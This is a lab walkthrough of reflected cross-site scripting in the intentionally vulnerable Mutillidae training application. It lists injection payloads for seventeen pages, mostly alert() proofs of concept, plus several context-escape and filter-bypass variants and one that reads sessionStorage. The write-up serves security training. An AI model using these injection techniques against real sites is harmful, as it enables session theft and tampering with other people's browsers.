In this walk through, we will be going through the Cross-Site Scripting (Reflected) vulnerability section from Mutillidae Labs. We will be exploring and exploiting Cross-Site Scripting (Reflected) attacks in various applications and learn how application are affected because of it. So, let’s get started with the Hacking without any delay.

Table of Contents
Security Level: 0 (Hosed)
- Setting the security level to 0 or Hosed.

1. DNS Lookup

<script>alert("Hacked")</script>


2. Pentest Tool Lookup


"}});alert(1);//


3. Text File Viewer




4. User Lookup

<script>alert("Hacked")</script>


5. Set Background color

<script>alert("Hacked")</script>

6. HTML5 Web Storage

alert(sessionStorage.getItem("CIA"));


7. Capture Data Page



<script>alert("Hacked")</script>


8. Document Viewer


<script>alert("Hacked")</script>


9. Arbitrary File Inclusion


http://localhost/mutillidae/index.php?page=%3Cscript%3Ealert(%22Hacked%22)%3C/script%3E


10. XML Validator

<test>$lDOMDocument>textContent=<![CDATA[<]]>script<![CDATA[>]]>alert('Hacked')<![CDATA[<]]>/script<![CDATA[>]]> </test>


11. User Lookup (XPath)

<script>alert("Hacked")</script>


12. Poll Question


<script>alert("Hacked")</script>


13. Register User

<script>alert("Hacked")</script>


14. Browser Info


<script>alert("Hacked")</script>


15. Back button



<script>alert("Hacked")</script>


16. Styling with Mutillidae


<script>alert(1)</script>


17. Password Generator

anonymous";}catch(e){}alert("Hacked");try{XSS="



Also Read: Mutillidae – CBC bit Flipping
Conclusion:

So, we finally completed all the security levels for the Cross-Site Scripting (Reflected) Vulnerability. We looked into the various ways how application has been set up in various levels and how we can bypass the security controls implemented. Next, we can mitigate the potential Reflected-XSS attacks by performing input sanitization on endpoints, whitelist the allowed characters in the input and using a WAF. On that note, i will take your leave and will meet you in next one with another Mutillidae vulnerability writeup, till then “Keep Hacking”.